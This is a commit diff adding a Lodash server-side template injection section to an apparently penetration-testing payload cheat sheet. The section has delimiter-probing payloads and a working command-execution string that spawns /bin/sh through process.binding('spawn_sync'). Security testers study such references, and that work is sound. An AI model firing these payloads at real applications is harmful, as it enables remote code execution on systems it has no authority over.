Merge pull request #670 from superboy-zjc/master

Update Lodash SSTI
This commit is contained in:
Swissky 2023-09-03 17:30:52 +02:00 committed by GitHub
commit c030379871
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -56,6 +56,9 @@
- [Lessjs - SSRF / LFI](#lessjs---ssrf--lfi)
- [Lessjs < v3 - Command Execution](#lessjs--v3---command-execution)
- [Plugins](#plugins)
- [JavaScript - Lodash](#Lodash)
- [Lodash - Basic Injection](#Lodash---Basic-Injection)
- [Lodash - Command Execution](#Lodash---Command-Execution)
- [Python - Mako](#mako)
- [Direct access to os from TemplateNamespace:](#direct-access-to-os-from-templatenamespace)
- [Java - Pebble](#pebble)
@ -743,6 +746,51 @@ registerPlugin({
---
## Lodash
[Official website](https://lodash.com/docs/4.17.15)
### Lodash - Basic Injection
How to create a template:
```javascript
const _ = require('lodash');
string = "{{= username}}"
const options = {
evaluate: /\{\{(.+?)\}\}/g,
interpolate: /\{\{=(.+?)\}\}/g,
escape: /\{\{-(.+?)\}\}/g,
};
_.template(string, options);
```
- **string:** The template string.
- **options.interpolate:** It is a regular expression that specifies the HTML *interpolate* delimiter.
- **options.evaluate:** It is a regular expression that specifies the HTML *evaluate* delimiter.
- **options.escape:** It is a regular expression that specifies the HTML *escape* delimiter.
For the purpose of RCE, the delimiter of templates is determined by the **options.evaluate** parameter.
```javascript
{{= _.VERSION}}
${= _.VERSION}
<%= _.VERSION %>
{{= _.templateSettings.evaluate }}
${= _.VERSION}
<%= _.VERSION %>
```
### Lodash - Command Execution
```
{{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}}
```
## Mako
[Official website](https://www.makotemplates.org/)